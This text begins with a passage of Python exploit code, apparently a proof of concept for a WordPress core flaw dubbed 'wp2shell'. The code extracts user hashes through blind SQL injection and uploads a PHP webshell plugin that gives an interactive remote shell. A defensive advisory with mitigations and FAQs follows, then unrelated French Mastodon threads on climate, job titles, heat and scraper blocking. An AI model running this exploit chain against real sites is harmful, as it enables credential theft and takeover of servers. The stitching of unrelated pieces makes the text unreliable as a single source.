php = f"<?php\n/* Plugin Name: WP2Shell */\nif (isset($_GET['t']) && $_GET['t'] === '{self._token}' && isset($_GET['c'])) {{\n chdir(dirname(__DIR__));\n echo 'WP2SHELL::' . shell_exec($_GET['c']) . '::END';\n exit;\n}}\n"
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w", zipfile.ZIP_DEFLATED) as zf:
zf.writestr(f"{self._slug}.php", php)
return buffer.getvalue()
def _nonce(self, html: str) -> Optional[str]:
form = re.search(r'action="[^"]*action=upload-plugin".*?name="_wpnonce"[^>]*value="([0-9a-f]+)"', html, re.S)
if form:
return form.group(1)
tag = re.search(r'[^>]*name="_wpnonce"[^>]*value="([0-9a-f]+)"', html)
return tag.group(1) if tag else None
staticmethod
def _multipart(fields: Dict[str, str], files: Dict[str, Tuple[str, bytes]]) -> Tuple[bytes, str]:
boundary = "----wp2shell" + uuid.uuid4().hex
buffer = io.BytesIO()
for name, value in fields.items():
buffer.write(f"--{boundary}\r\n".encode())
buffer.write(f'Content-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'.encode())
for name, (filename, content) in files.items():
buffer.write(f"--{boundary}\r\n".encode())
buffer.write(f'Content-Disposition: form-data; name="{name}"; filename="{filename}"\r\n'.encode())
buffer.write(b"Content-Type: application/octet-stream\r\n\r\n" + content + b"\r\n")
buffer.write(f"--{boundary}--\r\n".encode())
return buffer.getvalue(), f"multipart/form-data; boundary={boundary}"
# --- CLI ---
def main() -> int:
parser = argparse.ArgumentParser(description="wp2shell-poc (CVE-2026-63030)")
subparsers = parser.add_subparsers(dest="command", required=True)
p_check = subparsers.add_parser("check", help="Confirm vulnerability")
p_check.add_argument("url")
p_check.add_argument("--rest-route", action="store_true")
p_check.add_argument("--proxy")
p_check.add_argument("--timeout", type=float, default=30.0)
p_check.add_argument("--sleep", type=float, default=3.0)
p_check.add_argument("--samples", type=int, default=3)
p_check.add_argument("--confirm-sqli", action="store_true")
p_read = subparsers.add_parser("read", help="Extract data via blind SQLi")
p_read.add_argument("url")
p_read.add_argument("--rest-route", action="store_true")
p_read.add_argument("--proxy")
p_read.add_argument("--timeout", type=float, default=30.0)
p_read.add_argument("--preset", choices=["fingerprint", "users"])
p_read.add_argument("--query")
p_read.add_argument("--prefix", default="wp_")
p_read.add_argument("--max-length", type=int, default=128)
p_shell = subparsers.add_parser("shell", help="Post-auth plugin webshell helper")
p_shell.add_argument("url")
p_shell.add_argument("--user", required=True)
p_shell.add_argument("--password", required=True)
p_shell.add_argument("--proxy")
p_shell.add_argument("--timeout", type=float, default=30.0)
p_shell.add_argument("--cmd")
p_shell.add_argument("-i", "--interactive", action="store_true")
p_shell.add_argument("--cleanup", action="store_true")
args = parser.parse_args()
if args.command == "check":
client = BatchClient(args.url, timeout=max(args.timeout, args.sleep + 10), rest_route=args.rest_route, proxy=args.proxy)
probe = client.marker_probe()
if probe.status != 207:
_bad(f"Batch endpoint returned HTTP {probe.status} (not 207) — patched or REST API disabled.")
return 1
markers = client.batch_marker_codes(probe)
if markers:
_info(f"Batch probe -> HTTP 207; markers matched: {', '.join(markers)}")
else:
_good("Batch endpoint reachable and unauthenticated (HTTP 207).")
if client.has_route_confusion_markers(probe):
_good("VULNERABLE — batch route-confusion behavior detected.")
if not args.confirm_sqli:
_info("SQL timing confirmation not sent; use --confirm-sqli for the active SQLi probe.")
return 0
else:
_bad("Route-confusion marker pattern not detected.")
return 2
result = BlindSQLi(client, sleep=args.sleep).confirm_timing(samples=args.samples)
if args.samples > 1:
details = ", ".join(f"{base:.2f}s->{delay:.2f}s" for base, delay in result.samples)
_info(f"Timing samples: {details}")
_info(f"Median delta {result.delta:.2f}s; threshold {result.threshold:.2f}s.")
if result.confirmed:
_good(f"SQL timing confirmed — baseline {result.baseline:.2f}s, injected {result.delayed:.2f}s.")
return 0
else:
_warn(f"SQL timing not confirmed — baseline {result.baseline:.2f}s, injected {result.delayed:.2f}s.")
return 2
elif args.command == "read":
client = BatchClient(args.url, timeout=args.timeout, rest_route=args.rest_route, proxy=args.proxy)
sqli = BlindSQLi(client)
if args.query:
_info(f"Reading: {args.query}")
value = sqli.extract(args.query, max_length=args.max_length, on_char=_progress)
_clear_progress()
_good(f"Result: {value}")
elif args.preset == "fingerprint":
for label, expr in (("MySQL version", "SELECT @@version"), ("Database user", "SELECT CURRENT_USER()"), ("Database name", "SELECT DATABASE()")):
_good(f"{label}: {sqli.extract(expr, max_length=args.max_length)}")
elif args.preset == "users":
table = f"{args.prefix}users"
total = sqli.integer(f"SELECT COUNT(*) FROM {table}")
_info(f"{total} user(s) in {table}.")
for offset in range(total):
row = sqli.extract(f"SELECT CONCAT_WS(0x7c, ID, user_login, user_pass) FROM {table} ORDER BY ID LIMIT {offset},1", max_length=args.max_length, on_char=_progress)
_clear_progress()
_good(row)
_info(f"{sqli.requests} request(s) sent.")
return 0
elif args.command == "shell":
if not args.cmd and not args.interactive:
_bad("specify --cmd or --interactive")
return 2
_warn("This uploads a plugin containing a webshell to the target.")
session = AdminSession(args.url, timeout=args.timeout, proxy=args.proxy)
_info(f"Authenticating as {args.user!r}...")
if not session.login(args.user, args.password):
_bad("Login failed. Supply valid admin credentials (crack the hash recovered by 'read').")
return 1
_good("Authenticated.")
_info("Deploying webshell plugin...")
path = session.deploy_webshell()
_good(f"Webshell: {args.url.rstrip('/')}{path}")
rc = 0
if args.cmd:
output = session.run(path, args.cmd)
if output is None:
_bad("No output — the upload likely failed or the plugin is not web-served.")
rc = 1
else:
print(f"\n{output.rstrip()}\n")
if args.interactive:
_info("Interactive shell started. Type 'exit' to quit.")
while True:
try:
cmd = input("wp2shell> ").strip()
if cmd.lower() in ("exit", "quit"):
break
if not cmd:
continue
output = session.run(path, cmd)
print(output if output else "(no output)")
except (EOFError, KeyboardInterrupt):
break
if args.cleanup:
_info("Cleaning up webshell...")
if session.cleanup(path): # Note: cleanup method omitted for brevity in this unified script, but follows same _run pattern
_good("Webshell removed.")
else:
_warn("Cleanup failed. Remove manually.")
return rc
return 0
if __name__ == "__main__":
sys.exit(main())
More PoCs: https://github.com/Icex0/wp2shell-poc
Why SQL Injection Matters
The publicly released proof of concept stops at SQL injection.
Using blind SQLi, researchers showed it is possible to retrieve information such as:
- WordPress usernames
- Password hashes
- Database information
- Server fingerprints
The original researchers have intentionally withheld the final step that transforms database access into unauthenticated code execution.
That decision gives administrators additional time to deploy patches before full exploitation details become public.
Nevertheless, WordPress itself classifies the issue as one capable of leading to Remote Code Execution, indicating the Security Team independently verified the complete attack chain during remediation
Why Forced Updates Matter
WordPress supports automatic background updates, but administrators can disable them.
In this incident, the WordPress project enabled forced security updates for affected versions.
This is an unusual step.
The project generally avoids overriding administrator preferences except when facing vulnerabilities with exceptionally high risk.
The decision itself serves as an indicator of the severity assigned to this flaw.
Administrators should still verify that updates were successfully installed rather than assuming automatic mechanisms completed successfully.
No CVE… Initially
At disclosure, the wp2shell advisory did not include a CVE identifier.
This created an interesting challenge for defenders.
Many enterprise vulnerability scanners rely heavily on:
- CVE identifiers
- CVSS scores
- CISA Known Exploited Vulnerabilities (KEV)
Without a CVE, these systems may fail to alert administrators even though systems remain vulnerable.
WordPress later assigned identifiers to the affected vulnerabilities:
Vulnerability
Identifier
REST API Batch Route Confusion → RCE
CVE-2026-63030 / GHSA-ff9f-jf42-662q
Facilitated SQL Injection
CVE-2026-60137 / GHSA-fpp7-x2x2-2mjf
Organizations should verify patch status based on installed WordPress versions rather than relying solely on vulnerability scanners.
Why Patch Diffing Matters
One reality of open source software is that every security update also exposes the modified source code.
Attackers frequently compare vulnerable and patched versions to determine:
- What changed
- Which validation logic was added
- Which functions were modified
- How to recreate the original vulnerability
This process, commonly called patch diffing, often allows exploits to appear within hours or days of a security release.
While Searchlight Cyber has not released its complete exploit chain, attackers have access to both the vulnerable and fixed WordPress source code.
That significantly reduces the time defenders have available to deploy updates.
Temporary Mitigations
Updating remains the only complete solution.
For organizations unable to patch immediately, several temporary mitigations can reduce exposure.
1. Block REST Batch Requests
Block both endpoints:
/wp-json/batch/v1
and
?rest_route=/batch/v1
Filtering only one path is insufficient because WordPress supports both routing mechanisms.
2. Restrict Anonymous REST Access
Organizations may temporarily disable or authenticate public REST API access where business requirements permit.
Be aware that this may disrupt legitimate integrations and applications relying on REST functionality.
3. Filter Requests Before Dispatch
Custom filters using
rest_pre_dispatchcan reject anonymous requests targeting the batch endpoint until systems are upgraded.Indicators for Administrators
Administrators should immediately verify:
- WordPress version
- Automatic update status
- Web server logs for unusual POST requests to
/wp-json/batch/v1- Requests containing
rest_route=/batch/v1- Unexpected SQL query activity
- Newly created administrator accounts
- Recently installed plugins
Even if exploitation has not yet been publicly observed, early log analysis can reveal attempted reconnaissance.
Security Recommendations
Organizations operating WordPress should:
- Upgrade immediately to WordPress 7.0.2 or 6.9.5
- Verify automatic updates completed successfully
- Block REST batch endpoints if patching must be delayed
- Monitor logs for suspicious batch API requests
- Review administrator accounts and installed plugins
- Continue monitoring for additional indicators as researchers publish more technical details
FAQs
What is the WordPress wp2shell vulnerability?
wp2shell is a critical WordPress core vulnerability that can allow unauthenticated attackers to execute code on vulnerable WordPress 6.9.x and 7.0.x websites.
Which WordPress versions are affected?
WordPress versions 6.9.0 through 6.9.4 and 7.0.0 through 7.0.1 are affected. The issue is fixed in versions 6.9.5 and 7.0.2.
Does the vulnerability affect websites without plugins?
Yes. The vulnerability exists in WordPress core and can affect default installations with no plugins or custom themes.
Has the vulnerability been assigned a CVE?
Yes. The affected security issues are tracked as CVE-2026-63030 (REST API batch-route confusion leading to RCE) and CVE-2026-60137 (facilitated SQL injection).
How can I protect my WordPress site?
Update immediately to WordPress 7.0.2 or 6.9.5, verify your site version, and temporarily block access to the
/wp-json/batch/v1endpoint if immediate patching is not possible.Final Thoughts
wp2shell is one of the most significant WordPress core vulnerabilities disclosed in recent years. Its impact stems not only from the possibility of remote code execution, but also from how little an attacker needs to exploit it. A default installation with no plugins, no customizations, and no authentication can still be exposed if it remains unpatched.
The WordPress project’s decision to push emergency updates automatically underscores the seriousness of the issue. While researchers have intentionally withheld the complete exploit chain, history suggests that patch diffing and independent analysis will likely produce public exploit code in the near future.
For defenders, the window for proactive remediation is measured in days rather than weeks. Administrators should verify their WordPress version, confirm that security updates have been applied successfully, and review logs for suspicious requests targeting the REST Batch API. In situations like this, prompt patching remains the most effective defense.
Credits to – wp2shell.com
RE: https://mamot.fr/@burgervege/113299534212746346
J'ai eu tort. Ils sont passés à "C'est votre faute d'avoir été nuls, sinon on vous aurait écouté" mélangé à "Et nous on a les vraies solutions, pas vos solutions inefficaces d'écolos".
Les catastrophes naturelles vont faire passer les climato-dénialistes de "Ça n'arrivera pas ou dans trop longtemps pour qu'on s'en occupe" à "Vous nous saoulez à dire que vous nous aviez prévenu, l'important c'est de gérer les conséquences maintenant, pas s'apitoyer sur les causes passées". Prêt à prendre les paris.
@burgervege "faumetredéclims' " comme seul horizon. Clim dans les maisons, clim dans l'avion, clim dans la forêt , clim dans la nappe phréatique. Clim.
@mimimaton L'électricité devient trop cher, la centrale nucléaire se met à l'arrêt, la clim casse et les mêmes sont avec zéro solution, parce qu'il fait maintenant 50°C dehors.
@burgervege il y a un corolaire. Faut mettre des clims partout ET l'objectif affiché concernant les data centers est de consacrer entre 12 et 20% de la prod électrique du pays dans des fermes à GPU. Il va y avoir des arbitrages et c'est pas la clim qui va gagner, surtout. Mais on peut toujours doubler notre parc nucléaire, j' imagine. Comment ça " pas de budget "?
C'est l'erreur classique de croire qu'il suffit d'avoir raison pour convaincre/être reconnu politiquement.
Ou dit autrement, croire que maîtriser l'arme de la critique permet de se passer de la critique par les armes.
@lienrag Je crois qu'on pas qu'il suffise d'avoir raison pour convaincre. Je pensais qu'on passerait à "Vous aviez raison, mais c'est sans importance maintenant".
Finalement leur façon de reconnaître qu'on avait raison, c'est de dire que c'est notre faute, parce qu'on n'a pas su convaincre. Mais c'est de la mauvaise foi.
la vérité, c'est que ca les arrangeaient bien de ne pas comprendre
@burgervege Pour votre défense, j’ai entendu le « l'important c'est de gérer les conséquences maintenant, pas s'apitoyer sur les causes passées » dans la bouche d’un éditorialiste de France-Inter il y a quelques semaines. Ils vont juste très vite en besogne.
@burgervege Les gens de ce type pensent au premier degré que plus l'agriculture est intensive mieux c'est car ça diminue l'impact foncier des denrées alimentaires, en brandissant par exemple les pertes de rendement du blé.
Sauf que cette agriculture intensive a des impacts qui va au-delà des parcelles et intensifier l'agriculture au nom de l'efficacité foncière n'a aucun intérêt si c'est pour manger plus de produits intensifs en ressources (typiquement en permettant une part plus importante de produits d'origine animale ou bourrés de sucre) et pour artificialiser les sols à outrance au nom du « développement économique ».
@burgervege totalement d'accord avec ça et les solutions que ces imbéciles commencent à proposer, c'est toujours plus de technologie pour résoudre les problèmes. Une foi totalement aveugle dans le technosolutionnisme alors que c'est justement le technocentrisme de nos sociétés qui est une grande partie la cause de la merde dans laquelle nous sommes.
On suppose qu'il a prévu de ne plus être disponible pour les questions sur les conséquences de son action (et inaction)...
Bonjour le fediverse, on va recruter au Filament, mais on peine à trouver l'intitulé du poste et on aimerait de l'aide.
On est en quelque sorte intégrateurs #Odoo, mais :
- On ne travaille pas avec la version Entreprise, seulement en #logiciellibre avec la version Communautaire.
- On accompagne nos clients en s'intégrant à leur fonctionnement. #coolaboration
- On fait des développements spécifiques, parfois très personnalisés (mais basés sur Odoo).
- Nous sommes une Scop #cooperative
(1/4)
Les intitulés classiques, en plus de ne pas nous plaire, ne couvrent qu'une partie du besoin : "chef de projet, product owner, développeur, consultant"...
Comment appelleriez-vous une personne qui :
- S'intègre au fonctionnement d'une structure cliente pour en comprendre le besoin.
- Travaille avec elle pour définir / dimensionner la solution.
- Développe, implémente, installe, configure, et forme à l'utilisation de l'outil.
- Accompagne la structure et fait évoluer l'outil sur la durée.
(2/4)
De plus, la dimension des projets est variable.
Nous travaillons à la fois sur des outils entièrement spécifiques comme pour https://elo.coop/ et https://les-scop.coop/ qui peuvent occuper plusieurs jours par semaine, et des plus proche d'Odoo et modules #OCA pour des associations ou TPE/PME (majoritairement #SCOP et en #Occitanie) où la prise en charge initiale se prolonge par un suivi sur les années suivantes et de petites améliorations incrémentales.
(3/4)
Nous avons aussi commencé à développer un produit pour les territoires pour attirer des Saisonniers, en partenariat avec plusieurs Collectivités locales / chambres consulaires.
N'hésitez pas à discuter en commentaire pour dire ce que ça vous évoque, et nous proposer un intitulé qui parlera aux personnes dont le profil conviendrait.
Et bien sûr, si vous êtes ou que vous connaissez cette personne, n'hésitez pas à nous contacter directement !
(4/4)
Qui fournit écoute, conseil et expertise auprès d'un client, pour le compte d'une autre entreprise.
@Eldeberen La différence entre ce qu'on fait et un consultant c'est entre autres qu'un consultant donne un avis consultatif et éventuellement apporte une aide bornée dans le temps alors que nous on co-construit sur la durée, au sens où on conçoit la solution avec le client, implémente, met en place, intègre avec l'existant, maintient sur la durée, fait évoluer l'outil selon les besoins...
Voilà pourquoi cet intitulé ne convient pas bien.
@le_filament je dirais https://en.wikipedia.org/wiki/Forward_Deployed_Engineer mais le soucis c'est que c'est ce qui est poussé actuellement pour le déploiement IA en entreprise mais je trouve que ca colle bien.
Merci à toutes et tous pour vos partages, réponses, et suggestions. Ça nous a aidé à publier les deux fiches de poste disponible épinglées sur notre fil mastodon :
- https://pouet.chapril.org/@le_filament/116963058707420242
- https://pouet.chapril.org/@le_filament/116963070641896094
N'hésitez pas à faire tourner !
@oldsysops On fait de l'accompagnement, mais pas que. Sur les aspects techniques, s'ils n'ont pas les ressources en interne (courant chez les petites structures), on fait pour eux, ce qui n'est plus de l'accompagnement, mais de la prestation de service.
Donc "accompagnant" c'est bien, mais ne couvre pas tout le métier.
@le_filament
C'est consultant'e ou prestataire pour un terme épicène. Pourquoi ça ne vous avez plait pas ?
Je questionne votre besoin pour mieux le comprendre pas le deligitimer
Merci @dallo parce que Consultant est très connoté ESN et dans notre imaginaire ne correspond pas à la relation de confiance qu'on essaie de nouer avec notre client. Dans le monde Odoo on parle beaucoup de Consultant Fonctionnel.
Prestataire est plus neutre, mais il nous semble plus correspondre à la relation (entre les structures) qu'à la fiche de poste (parce que trop neutre ?)
@le_filament @dallo très cool ce questionnement !
Je serais aussi favorable à Consultant, bien qu'il soit trop teinté ESN, peut etre que c'est l'occasion de se réapproprier des mots ?
J'en faisait la remarque à une asso qui recherchait un mouton à plusieurs pattes et dont le titre du poste était "animateur".
Sinon, je me demande quelles termes utilisent des entreprises comme indie hosters, opensourcepolitics, etc. Dont les profils peuvent ressembler ?
@bouviermullerp il faut les taguer pour qu'ils puissent répondre 😸 @IndieHosters @LaSuiteCoop @OpenSourcePolitics, vous en dites quoi ?
@h30x @bouviermullerp @IndieHosters @LaSuiteCoop @OpenSourcePolitics
Bonne question et super initiative ce brainstorming ;)
Coté IndieHosters/LaSuite.coop on doit justement retravailler nos fiches de poste, on a pas encore tranché la question du nom des postes. Et c'est effectivement complexe de tout englober quand on est une petite coopérative ou chacun porte plusieurs rôles.
Peut être quelque-chose comme : 'coopérateur numérique libre'
@le_filament
Humain ATOUT faire 😄.
Bon, sous cet air moqueur, le sous entendu est là. D'autres pistes :
- conseiller•e d'avenir
- intégrateur•ice de besoins
- formaliseur•e de solutions
- constructeur•ice de futurs
À ce niveau, il me semble préférable d'inventer vos propres concepts, parce que votre travail ne ressemble pas aux autres, faites rêver 😃.
Et surtout, pas d'anglicisme (avis perso : ça fait trop « business / corporate / BFM », beurk !)
# recrutement #informatique #jerecrute
@Desmoric Sur le suffixe on n'est pas tellement sur "avenir / futur" vu qu'on est dans le concret, mais plus dans le "besoin / solutions".
Sur le préfixe, c'est effectivement un mélange entre conseillere / intégrateurice / constructeurice.
Et oui, il faut inventer nos propres concepts, une recherche sur le mot clé "coolaboration" fait ressortir peu de résultats, mais Le Filament en fait partie.
On pourrait donc partir sur "coolaborateurice" mais ça dit pas grand chose du métier non plus.
@le_filament
L'intitulé du poste n'est pas forcément important (la fiche de poste est là pour détailler les missions).
Mon propos était plutôt de vous inviter à vous démarquer du reste des offre d'emploi pour refléter l'état d'esprit de votre organisation : être au service du client. C'est cela qui fait votre spécificité, votre identité. Et c'est cela (on peut l'espérer) qui attirera les personnes vers vous.
J'aime beaucoup le concept de coolaborateur, ça donne envie 🫶
@le_filament vous cherchez quelqu'un qui se reconnaisse dans votre façon de travailler, et avec un certain profil technique: Co-intégrateur Odoo Community ?
Des orages à partir de 9h qu'ils disaient (mensonge)
@St_B ici on a eu un peu de pluie. J'ai réussi à faire redescendre l'air de la maison à 25° vers 10h. Mais c'est déjà fini car les murs sont tellement chauds que ça remonte en flèche après avoir tout refermé. Tout ça pour dire que même si c'est appréciable ça ne change pas grand chose, hélas !
bon courage à vous !
@oldsysops @gawel parce qu'il fait combien chez toi là ? (Dehors je veux dire)
quand on va au soleil, il doit faire 25-26 mais avec le vent ca reste presque frais...
@oldsysops @St_B A l'intérieur j'ai 28°. Dehors c'est monté à 35° à l'ombre je crois. 49° dans le camion au soleil. On se plaint pas. Je crois qu'aujourd'hui c'est le début de la fin. Les oiseaux ont l'air de revivre un peu. Et on a le luxe de pouvoir se baigner 15 fois par jour. Ma seule complainte c'est que l'océan à 20° c'est beaucoup trop chaud
@oldsysops @St_B et aussi qu'on a l'impression que la moitié de l'Europe s'est dit "tiens si on allait voir Gaël pour le 14 juillet"
@gawel moi je crois que je vais aller voir @oldsysops là, 22°C je sais même plus ce que ça veut dire
@oldsysops @St_B perso ce qui m'emmerde c'est que tout ces touristes vont faire caca (et donc tirer la chasse d'eau) alors qu'on est en alerte sécheresse et qu'il n'y a toujours pas de loi pour forcer les gens à avoir des toilettes sèche. (si vous avez les moyens je recommande https://www.trelino.com/fr-fr )
@gawel @oldsysops je te préviens maintenant j'ai plein de questions
@St_B @oldsysops merde alors! Mais si c'est comme les questions sur les tiny house je m'en fait pas trop! :D
prenez soin de vous
Anecdote de Malik en direct du train cet après-midi: "Un contrôleur nous a dit de te remercier parce qu'il utilise 1.2.Train pour vérifier les horaires plus rapidement."
Première fois que ça arrive.
@jeanbaptistemarie "et puis il m'a collé une prune derrière, parce que faut pas perdre le rythme" :D
📣 Cela n'était pas arrivé depuis 13 ans, merci de relayer !
✅ Nous recrutons H/F Administrateur des systèmes d'information et réseaux pour nous accompagner dans l'aventure de l' @iscpif (Paris 13ème, http://iscpif.fr).
🚀 Intégrez un collectif de recherche et aidez-nous à inventer le futur !
🎯 Les Missions
Piloter l’évolution d’architectures informatiques matérielles ou logicielles libre et accompagner les équipes @cnrs.fr dans les projets impliquant des services web et plateformes.
CDD les premiers mois pour des raisons administratives mais le poste a vocation à être pérennisé.
Grande question recrutement : pourquoi les entreprises (et entités punliques) passent ailleurs que par @FranceTravail et @Apecfr ? Les ESN / SSII et autres plateformes concurrentes captent tout ? Hellowork, LinkedIn...
Allez. Je suis curieuse et c’est un truc qui me travaille. Sondage sérieux
Approximativement le revenu par personne dans votre foyer c’est comment ? ( un enfant est une personne)
| - de 750€: | 2 |
| Entre 750 et 1300€: | 0 |
| Entre 1300 et 2000€: | 0 |
| Plus de 2000€: | 0 |
Votre logement vous prend ?
| Moins de 30% des revenus du foyer: | 0 |
| Entre 30 et 50%: | 1 |
| Plus de 50% des revenus du foyer: | 0 |
Le logement que vous habitez répond t’il à vos besoins en terme de surface, de nombre de pièces, d’accès à votre travail ou au commodités
| Trop petit: | 1 |
| Manque une chambre: | 0 |
| Trop loin du boulot: | 0 |
| Trop loin du sex shop: | 0 |
Est ce que vous devez renoncer à des choses par manque de moyen ?
| Oui les loisirs: | 1 |
| Oui la santé: | 1 |
| Oui la bouffe: | 1 |
| Oui autre: | 1 |
Est ce que vous arrivez à épargner ?
| Oui tout les mois: | 0 |
| Oui de temps en temps: | 0 |
| Épaquoi ?: | 1 |
Vous est il déjà arrivé que vos enfants vous fasse part de leurs inquiétudes financières sur avenir ( vous demander de renoncer à des achats, vous dire qu’ils vont faire une alternance pour vous épargner le coût de leurs études, vous demander si vous allez pouvoir payer les factures )
| Oui: | 1 |
| Oh mon dieu jamais !: | 0 |
@EsmeeWeatherwax j'ai voté tous les mois mais c'est depuis peu (j'ai bientôt 50 ans), ma santé mentale m'a empêché d'avoir la moindre capacité de gérer mon argent pendant toute ma vie adulte, l'épargne c'est récent et l'idée c'est que c'est pas moi qui va profiter.
@EsmeeWeatherwax
Question compliquée ^^°
J'ai une épargne automatique minuscule (50€) et des épargnes plus importantes de temps en temps (par exemple 300€)
J'ai tendance à ne pas compter l'épargne automatique.
@Galamadryade mon épargne automatique c’est 10euro et y’a pas un mois où je la remets pas sur mon compte courant à la fin du mois
@EsmeeWeatherwax autre: les vacances. je ne prends pas assez de congés et je pars en vacances (genre pas dormir chez moi) une fois tous les 5 ans environ.
@EsmeeWeatherwax et @ les gens qui répondent :
Pour comparaison, si on prend les chiffres INSEE, la répartition donne ça.
Source : https://www.insee.fr/fr/statistiques/8278898?sommaire=8278909
Avec 1 enfant = 0,3 personne avant 14 ans puis 0,5 avant 18ans. d'après https://www.insee.fr/fr/statistiques/9019316#onglet-1
On devrait avoir ~50% de réponses "plus de 2000€" 😮 Donc ici c'est pas représentatif de FR, mais curieux de voir comment changeraient les réponses du fédiverse, si on "réduit" les enfants ?
EDIT : revenus/personne
a repartagéHello Masto !
Mon instance va fermer ses portes cet été ... et je ne sais pas du tout où migrer mon compte...
Vous connaissez des instances sympa et qui accepte les nouveaux comptes ?
Je lance ma propre instance (j'ai cru comprendre que c'était assez lourd ?)
Le repouet rend riche (NON)
#mastohelp
Hi All, I am looking for full time, mid-senior level UK #Python job roles. I am based in the UK and I've got 9 years experience working with it primarily in scientific disciplines (Earth Observation #EO #RemoteSensing) and a small amount in doing backend work. I've designed a wide variety of scientific Python scripts and programs and I've had the privellige of working with #ESA on several projects including presenting my work internationally and having my investigations published on their websites.
I'm looking for more coding work in scientific disciplines or more #Humanitarian work if possible. I am also skilled in QA like work, deep analysis, Git and self hosting.
I'm primarily open to remote work within the UK and remote European work dependent on what is available. I am open to hybrid work based in Buckinghamshire but it would preferably have to be 1 day a week in an office, potentially 2. Reply or DM me for more details. Boosts appreciated!
Ok, donc suite à l’échange ci-après, j’avais créé une «fausse forge» logicielle : une vraie installation de Forgejo dans laquelle j’ai cloné les repo complets des projets rsync, rails et quakeforge, dans le but de me confronter à ce type d’hébergement et de voir ce qu’il en résultait en terme de scraping.
Ben en vrai c’est pas du tout impressionnant. Mon serveur est protégé par un robots.txt, par le blocage de quelques ASN dans son parefeu et par crowdsec (en version gratuite).
J’ai posé la forge derrière un nom de domaine existant depuis de nombreuses années, mais qui n’hébergeait plus rien de visible. Malgré tout, pendant une bonne semaine j’ai plafonné à 2 ou 3 hits par jour.
J’ai alors utilisé comme levier un vieux site qui se fait régulièrement scrapé et qui contient des milliers de pages statiques. J’ai injecté dans le pied d’une partie de ces pages un lien vers ma fausse forge.
Merveille, les scrapers ont enfin trouvé l’entrée. Malgré tout, ça plafonne : au plus haut on parle de moins de 7250 requêtes par jour, avec une moyenne sous les 6800 r/j. C’est faible. Sur 2 semaines de scraping c’est tout de même plus de 57000 URL différentes qui ont été aspirées par les bots. Évidemment en termes de ressources consommées ce n’est même pas mesurable.
On est TRÈS TRÈS loin des chiffres avancés par de nombreuses personnes… Encore une fois je ne nie pas le problème, mais je ne peux que constater mon incapacité à le reproduire.
@patpro Tu n'as peut-être eu que des crawlers de grosses boîtes qui respectent vaguement l'infra... Nous sur des clients qui ont des wordpress et des milliers de pages, on a vu des machins passer qui essayaient d'aspirer 100 pages par seconde, forcément derrière le serveur il ne se sentait pas très bien...
@asl Je veux bien, mais quelle est la proba que ça se passe comme ça ?
Est-ce que par un tour de magie j’ai résolu le problème du scraping abusif en bloquant moins d’une dizaine d’ASN ? Je pense pas, c’est encore plus improbable.
Pour réf. : AS11878 AS136907 AS21859 AS37963
AS132203 AS200373 AS28573 AS45899
Coté Source :
~614 487 IP sources : rappel, on est sûr du logiciel NON grand publique, un peu niche avec zéro contribution de dev externe a l'entreprise, ce qui est normale.
Si j'enlève les IP de l'infra (monitoring, jenkins, redmine) on enlève ~630 000 requêtes pour 6 IPs.
reste 2 500 000 requêtes et 614 481 IPs ...
~ 582 000 IPs, on fait moins de 10 requêtes (pour un total de 1754808 requêtes soit plus de 50%) dans les détails :
~ 257 998 IPs, on fait une seule requête pour un total de 257998.
36395 IPs, on fait seulement 2 requêtes pour un total de 72790
125627 IPs, on fait seulement 3 requêtes pour un total de 376881
28233 IPs, on fait seulement 4 requêtes pour un total de 112932
15122 IPs, on fait seulement 5 requêtes pour un total de 75610
60216 IPs, on fait seulement 6 requêtes pour un total de 361296
sinon on est ~ une trentaine (et pas tous dev) et en ce lundi de juillet, les bureaux parisiens (ou il y a pas grand monde ~ 3 personnes) ont fait environ 800 requêtes...
donc l'usage "légitime" sur la journée doit être ~ 30 000 requêtes (évaluation haute) soit 1% de l'usage. (bon l'infra compte pour 20% quand même 🙂 )
bref, on n'est pas sur les mêmes chiffres, mais on dépasse largement ton test.
Plusieurs point : l'url du git est ancienne (depuis plus de 10 ans) il y a eu quelques changements, mais globalement ce sont les mêmes urls.
De toute façon, c'est seulement depuis moins de 2 ans qu'on a un nombre de requêtes aussi importantes. Au point de déclencher des erreurs sur le monitoring et d'empêcher l'usage correct de la plateforme.
Je pense que les robots ne sont pas ceux des moteurs de recherche, ils ne parcourent pas internet à la recherche de page a indexé, mais plutôt des robots qui ciblent des URLS particulières " à forte valeur ajoutée" (des urls de code opensource accessible, super pour alimenter des IAs de code).
@oldsysops tu aurais moyen de déterminer quel pourcentage de traffic est causé par des IP appartenant aux ASN que je bloque (AS11878 AS136907 AS21859 AS37963 AS132203 AS200373 AS28573 AS45899) ?
@oldsysops j'ai un script de conversion ASN - > netblock qui me sert à alimenter mon firewall, je le poste dans quelques heures, quand je ne serai plus officiellement en train de dormir
@oldsysops J’ai tout posé là sans faire le tri : https://www.patpro.net/pf.d.tgz
les ASN avec parfois le pourquoi du blocage, le script qui convertit un ASN en liste de subnets et qui pousse le résultat dans une table de mon fw, le fichiers intermédiaires de listes de subnets.
@oldsysops sans préjuger de ton angle d’attaque, sur de tels volumes l’approche de considérer que les IP d’un même /24 appartiennent à un même ASN pourrait diviser la charge d’analyse par 256 (max). Dans le même esprit une analyse d’une ligne de log sur 10 ou sur 50 pourrait conserver une valeur statistique.
@oldsysops J’ai vu que j’avais aussi bloqué une vielle version de https://openai.com/gptbot-ranges.txt j’ai mis à jour la liste au niveau de mon firewall : j’ai pour ainsi dire plus aucune visite sur ma fausse forge. Le nombre de hits est passé de 280/h à 4/h.
Je vais pas passer plus de temps dessus...
l'as45899 est effectivement important dans le nombre de source.
une vérification rapide montre que c'est environ 3 requetes par IP par contre... mais ca me semble intéressant a filtrer.
les plus gros AS en source d'ip (pas forcément en requete):
AS212238 : 4121
AS209 : 4154
AS27 : 4726
AS7018 : 4810
AS7713 : 4832
AS55836 : 5579
AS21928 : 5681
AS38 : 5905
AS7552 : 6061
AS36352 : 6076
AS59 : 6516
AS701 : 7239
AS45899 : 8405
AS174 : 10919
AS8 : 13300
AS17 : 14404
AS14 : 17840
AS7922 : 19785
AS20 : 26626
sinon il y a plus de 10339 ASN source qui ont joint notre serveur git en 24H. Et encore le script à planter avant la, fin je serais pas étonné qu'on soit plus proches des 15000
Soit plus de 10% des ASN dans le monde (il y en aurait 120 000 environ).
@oldsysops whoua c’est juste énorme. Trop merci les proxies résidentiels :(
Super boulot en tout cas. Ça n’explique pas ce que j’observe mais ça précise ce qu’il se passe quand ça prend des proportions dantesques.
@oldsysops avec perl et mojolicious ça va pas le faire alors ? 😅
Le petit plus #fediverse :
